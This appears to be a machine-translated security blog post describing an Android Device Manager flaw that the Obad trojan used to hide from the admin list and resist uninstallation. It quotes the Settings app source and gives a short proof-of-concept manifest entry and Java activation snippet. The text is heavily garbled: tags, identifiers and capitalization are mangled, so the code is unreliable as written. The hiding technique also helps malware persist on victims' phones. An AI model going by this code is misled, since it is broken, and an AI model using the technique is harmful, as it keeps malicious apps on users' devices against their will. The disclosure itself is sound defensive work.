Android Device Manager Vulnerability

I. Vulnerability description
Currently, Backdoor. AndroidOS. Obad. a, known as the "strongest Android trojan in History", uses the Android Device Manager Vulnerability to Prevent Users From uninstalling it normally. In fact, this vulnerability was discovered as early as the end of last year.
Applications registered as "Device Manager" cannot be directly uninstalled. You can uninstall the Device Manager only after activating it.
Trojan can be usedAndroidThe Device Manager Vulnerability reaches the list in the Device Manager List."Stealth". In this way, users cannot enter"Cancel activation"Page.

Ii. Affected Versions

Android2.2 and later
Iii. Vulnerability principles
First, let's take a look at how the Settings app forms the Device Manager List:
 
Related Classes:
Packages \ apps \ settings \ src \ com \ android \ settings \ DeviceAdminSettings. java

Public class DeviceAdminSettings extends ListFragment {inclumdpm; final HashSet <ComponentName> mActiveAdmins = new HashSet <ComponentName> (); final ArrayList <DeviceAdminInfo> dependencies = new ArrayList <DeviceAdminInfo> (); @ Override public void onResume () {super. onResume (); updateList ();} void updateList () {mActiveAdmins. clear (); List <ComponentName> cur = mDPM. getActiveAdmins (); If (cur! = Null) {for (int I = 0; I <cur. size (); I ++) {mActiveAdmins. add (cur. get (I) ;}} mAvailableAdmins. clear (); List <ResolveInfo> avail = getActivity (). getPackageManager (). queryBroadcastReceivers (new Intent (DeviceAdminReceiver. ACTION_DEVICE_ADMIN_ENABLED), PackageManager. GET_META_DATA); // broadcast by querying "android. app. action. DEVICE_ADMIN_ENABLED "to get the available settings // list of backup manager programs int count = avail = null? 0: avail. size (); for (int I = 0; I <count; I ++) {ResolveInfo ri = avail. get (I); try {DeviceAdminInfo dpi = new DeviceAdminInfo (getActivity (), ri); if (dpi. isVisible () | mActiveAdmins. contains (dpi. getComponent () {mAvailableAdmins. add (dpi);} // if the application has activated the device manager & Registered "android. app. action. DEVICE_ADMIN_ENABLED "appears in the list of available device managers} catch (XmlPullParserException e) {Log. w (TAG, "Skipping" + ri. activityInfo, e);} catch (IOException e) {Log. w (TAG, "Skipping" + ri. activityInfo, e) ;}} getListView (). setAdapter (new PolicyListAdapter ());}....... class PolicyListAdapter extends BaseAdapter {....... public void bindView (View view, int position) {final Activity = getActivity (); ViewHolder h_= (ViewHolder) view. getTag (); DeviceAdminInfo item = mAvailableAdmins. get (position); // display the data in mAvailableAdmins. icon. setImageDrawable (item. loadIcon (activity. getPackageManager (); FLAC. name. setText (item. loadLabel (activity. getPackageManager (); FLAC. checkbox. setChecked (mActiveAdmins. contains (item. getComponent (); try {FLAC. description. setText (item. loadDescription (activity. getPackageManager ();} catch (Resources. notFoundException e ){}}}}

 
By Android Settings App The source code shows that if you want " Stealth " , As long as you do not register "Android. app. action. DEVICE_ADMIN_ENABLED" Broadcast.

Iv. POC code
 
AndroidMainfest. xml file registration component:

<Er Android: name = ". deviceAdminReceiver" android: label = "@ string/app_name"
Android: description = "@ string/description" android: permission = "android. permission. BIND_DEVICE_ADMIN">

<Meta-data Android: name = "android. app. device_admin"
Android: resource = "@ xml/device_admin"/>

</Cycler>
Register and activate the Device Manager using java code:

Intent intent = new Intent (
DevicePolicyManager. ACTION_ADD_DEVICE_ADMIN );
ComponentName mDeviceComponentName = new ComponentName ("packagename", "packagename. deviceAdminReceiver ");
Intent. putExtra (DevicePolicyManager. EXTRA_DEVICE_ADMIN,
MDeviceComponentName );
This. startActivity (intent, 0 );


5. Related Links

Http://www.bkjia.com/Article/201306/221476.html

 

Article: http://blog.csdn.net/jiazhijun/article/details/9124747
By Jack_Jia mail: 309zhijun@163.com